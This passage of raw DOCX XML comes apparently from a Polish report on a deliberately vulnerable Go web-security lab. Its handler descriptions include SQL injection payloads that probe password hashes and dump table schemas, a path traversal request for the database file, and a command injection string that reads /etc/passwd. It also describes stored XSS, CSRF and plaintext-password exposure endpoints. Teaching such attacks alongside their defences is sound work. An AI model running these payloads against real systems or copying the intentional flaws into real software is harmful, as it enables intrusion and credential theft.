        <w:t>Listing 60. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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85" w:name="sec85"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.51. *Handler.SearchVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85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internal/handlers/handlers.go:795</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SearchVulnerable is a force-vulnerable SQL Injection endpoint that always uses string concatenation, regardless of SECURITY_ENABLED. Kept for the side-by-side defense demo.  Try: /api/search-vulnerable?q=zz' ORDER BY 8 -- Or:  /api/search-vulnerable?q=zz' OR EXISTS(SELECT 1 FROM users WHERE username='admin' AND substr(password_hash,1,1)='a') -- Or:  /api/search-vulnerable?q=zz' UNION SELECT 1, name, sql, 1, char(32), char(32), char(32) FROM sqlite_master WHERE type='table' -- Or:  /api/search-vulnerable?q=zz' UNION SELECT 9000, '[intel] database map', 'users=' || (SELECT COUNT(*) FROM users) || ' tables=' || (SELECT group_concat(name, ', ') FROM sqlite_master WHERE type='table'), 1, 'sqli-bot', char(32), char(32) --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SearchVulnerable is a force-vulnerable SQL Injection endpoint that always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uses string concatenation, regardless of SECURITY_ENABLED. Kept for the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side-by-side defense demo.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Try: /api/search-vulnerable?q=zz' ORDER BY 8 --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Or:  /api/search-vulnerable?q=zz' OR EXISTS(SELECT 1 FROM users WHERE username='admin' AND substr(password_hash,1,1)='a') --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Or:  /api/search-vulnerable?q=zz' UNION SELECT 1, name, sql, 1, char(32), char(32), char(32) FROM sqlite_master WHERE type='table' --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Or:  /api/search-vulnerable?q=zz' UNION SELECT 9000, '[intel] database map', 'users=' || (SELECT COUNT(*) FROM users) || ' tables=' || (SELECT group_concat(name, ', ') FROM sqlite_master WHERE type='table'), 1, 'sqli-bot', char(32), char(32) --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SearchVulnerable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61" w:name="lst61"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 61. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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86" w:name="sec86"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.52. *Handler.PageSearch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86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internal/handlers/handlers.go:818</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageSearch renders the full search page with the form.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PageSearch renders the full search page with the form.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PageSearch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62" w:name="lst62"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 62. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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87" w:name="sec87"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.53. *Handler.PageSearchPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87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internal/handlers/handlers.go:838</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageSearchPartial returns just the results fragment for HTMX.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PageSearchPartial returns just the results fragment for HTMX.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PageSearchPartial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63" w:name="lst63"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 63. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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88" w:name="sec88"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.54. modeLabel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88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internal/handlers/handlers.go:861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modeLabel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secure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064" w:name="lst64"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 64. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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secure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89" w:name="sec89"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.55. *Handler.PageSecurityMap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89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internal/handlers/handlers.go:871</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageSecurityMap renders a feature-first overview of the lab. It makes the vulnerabilities discoverable through normal application workflows instead of only through the dedicated demo hub.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PageSecurityMap renders a feature-first overview of the lab. It makes the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vulnerabilities discoverable through normal application workflows instead of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only through the dedicated demo hub.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PageSecurityMap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65" w:name="lst65"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 65. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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90" w:name="sec90"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.56. *Handler.PageVulnDemos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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internal/handlers/handlers.go:882</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageVulnDemos renders a feature security index. The route name is legacy, but the content points to real application workflows rather than detached proof-of-concept pages.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PageVulnDemos renders a feature security index. The route name is legacy,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but the content points to real application workflows rather than detached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proof-of-concept pages.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PageVulnDemos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66" w:name="lst66"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 66. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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91" w:name="sec91"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.57. *Handler.CommentsVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91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internal/handlers/handlers.go:974</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CommentsVulnerable stores comments without sanitization (Stored XSS demo). The raw HTML body is persisted directly so &lt;script&gt; tags execute on render.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CommentsVulnerable stores comments without sanitization (Stored XSS demo).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The raw HTML body is persisted directly so &lt;script&gt; tags execute on render.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CommentsVulnerable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67" w:name="lst67"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 67. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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92" w:name="sec92"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.58. *Handler.CsrfFormVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92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internal/handlers/handlers.go:1013</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CsrfFormVulnerable returns and accepts a form without CSRF protection. The POST handler actually updates the logged-in user's email address, making the state-change exploitable via a cross-origin request.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CsrfFormVulnerable returns and accepts a form without CSRF protection.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The POST handler actually updates the logged-in user's email address,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making the state-change exploitable via a cross-origin request.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CsrfFormVulnerable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68" w:name="lst68"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 68. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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93" w:name="sec93"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.59. *Handler.ProfileSettings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93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internal/handlers/handlers.go:1052</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ProfileSettings is the real profile-email workflow used by the UI. The same route is intentionally vulnerable when SECURITY_ENABLED=false and protected by a CSRF token when SECURITY_ENABLED=true.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ProfileSettings is the real profile-email workflow used by the UI. The same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route is intentionally vulnerable when SECURITY_ENABLED=false and protected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by a CSRF token when SECURITY_ENABLED=true.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ProfileSettings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69" w:name="lst69"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 69. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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94" w:name="sec94"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.60. *Handler.CommentsSecure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94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internal/handlers/handlers.go:1068</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CommentsSecure stores a comment after HTML-escaping the body. Used by the secure JSON API endpoint for the XSS demo.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CommentsSecure stores a comment after HTML-escaping the body.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Used by the secure JSON API endpoint for the XSS demo.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CommentsSecure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70" w:name="lst70"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 70. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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95" w:name="sec95"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.61. *Handler.PagePostDetail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95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internal/handlers/handlers.go:1106</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PagePostDetail renders a single post with its comment thread. Comments are rendered with templ.Raw in insecure mode (Stored XSS) and as plain text in secure mode.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PagePostDetail renders a single post with its comment thread.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Comments are rendered with templ.Raw in insecure mode (Stored XSS) and as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plain text in secure mode.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PagePostDetail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71" w:name="lst71"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 71. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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96" w:name="sec96"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.62. *Handler.PagePostCommentSubmit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96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internal/handlers/handlers.go:1139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PagePostCommentSubmit processes a form-based comment submission from the post detail page.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PagePostCommentSubmit processes a form-based comment submission from the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post detail page.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PagePostCommentSubmit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72" w:name="lst72"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 72. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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97" w:name="sec97"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.63. generateCSRFToken</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97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internal/handlers/handlers.go:1175</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generateCSRFToken creates a cryptographically random base64url token.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generateCSRFToken creates a cryptographically random base64url token.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generateCSRFToken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073" w:name="lst73"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 73. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="98" w:name="sec98"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.64. setCSRFCookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98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internal/handlers/handlers.go:1185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setCSRFCookie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token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74" w:name="lst74"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 74. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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token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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="99" w:name="sec99"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.65. *Handler.CsrfSecureForm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99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internal/handlers/handlers.go:1193</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CsrfSecureForm handles the CSRF-protected email-update form. GET: issues a new CSRF token (stored in a cookie and embedded in the form). POST: validates the token before performing the email update.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CsrfSecureForm handles the CSRF-protected email-update form.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GET: issues a new CSRF token (stored in a cookie and embedded in the form).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POST: validates the token before performing the email update.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CsrfSecureForm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75" w:name="lst75"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 75. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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100" w:name="sec100"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.66. *Handler.PageIDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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internal/handlers/handlers.go:1256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageIDOR renders the Broken Access Control / IDOR demo page.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PageIDOR renders the Broken Access Control / IDOR demo page.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PageIDOR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76" w:name="lst76"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 76. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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101" w:name="sec101"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.67. *Handler.PageDBExpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101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internal/handlers/handlers.go:1270</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageDBExpose renders the Sensitive Data Exposure demo page. In insecure mode it lists all users with their plaintext passwords. In secure mode it returns a 403 page showing only hashed passwords.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PageDBExpose renders the Sensitive Data Exposure demo page.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In insecure mode it lists all users with their plaintext passwords.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In secure mode it returns a 403 page showing only hashed passwords.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PageDBExpose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77" w:name="lst77"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 77. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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102" w:name="sec102"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.68. *Handler.FilesVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102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internal/handlers/handlers.go:1287</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FilesVulnerable reads a file from the uploads directory by directly concatenating the user-supplied filename — exploitable with path traversal.  Example: /api/files-vulnerable?name=../app.db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FilesVulnerable reads a file from the uploads directory by directly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concatenating the user-supplied filename — exploitable with path traversal.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Example: /api/files-vulnerable?name=../app.db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FilesVulnerable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78" w:name="lst78"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 78. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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103" w:name="sec103"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.69. *Handler.FilesSecure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103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internal/handlers/handlers.go:1313</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FilesSecure reads a file from the uploads directory after validating that the resolved path stays within the uploads directory.  Example (blocked): /api/files-secure?name=../app.db → 400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FilesSecure reads a file from the uploads directory after validating that the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resolved path stays within the uploads directory.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Example (blocked): /api/files-secure?name=../app.db → 400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FilesSecure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79" w:name="lst79"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 79. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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104" w:name="sec104"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.70. safeUploadPath</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104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internal/handlers/handlers.go:1341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safeUploadPath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80" w:name="lst80"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 80. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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05" w:name="sec105"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.71. *Handler.PagePathTraversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105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internal/handlers/handlers.go:1364</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PagePathTraversal renders the Path Traversal / LFI demo page.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PagePathTraversal renders the Path Traversal / LFI demo page.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PagePathTraversal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81" w:name="lst81"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 81. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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106" w:name="sec106"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.72. validatePingHost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106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internal/handlers/handlers.go:1419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validatePingHost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host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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2082" w:name="lst82"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 82. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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host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07" w:name="sec107"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.73. runSecurePing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107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internal/handlers/handlers.go:1429</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda używana w zabezpieczonej ścieżce trybu secure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runSecurePing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ctx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Context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host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83" w:name="lst83"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 83. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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ctx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>context.Context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host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08" w:name="sec108"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.74. *Handler.PingVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108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internal/handlers/handlers.go:1451</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PingVulnerable runs ping by concatenating user input into sh -c. This is intentionally vulnerable to command injection for the lab demo.  Example exploit: /api/ping-vulnerable?host=8.8.8.8+;+cat+/etc/passwd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PingVulnerable runs ping by concatenating user input into sh -c.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This is intentionally vulnerable to command injection for the lab demo.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Example exploit: /api/ping-vulnerable?host=8.8.8.8+;+cat+/etc/passwd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PingVulnerable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84" w:name="lst84"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 84. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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109" w:name="sec109"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.75. *Handler.PingSecure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109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internal/handlers/handlers.go:1472</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PingSecure runs ping after validating that the host contains only safe characters. The command is invoked directly without a shell so metacharacters have no effect.  Example (blocked): /api/ping-secure?host=8.8.8.8+;+cat+/etc/passwd → 400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PingSecure runs ping after validating that the host contains only safe characters.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The command is invoked directly without a shell so metacharacters have no effect.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Example (blocked): /api/ping-secure?host=8.8.8.8+;+cat+/etc/passwd → 400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PingSecure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85" w:name="lst85"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
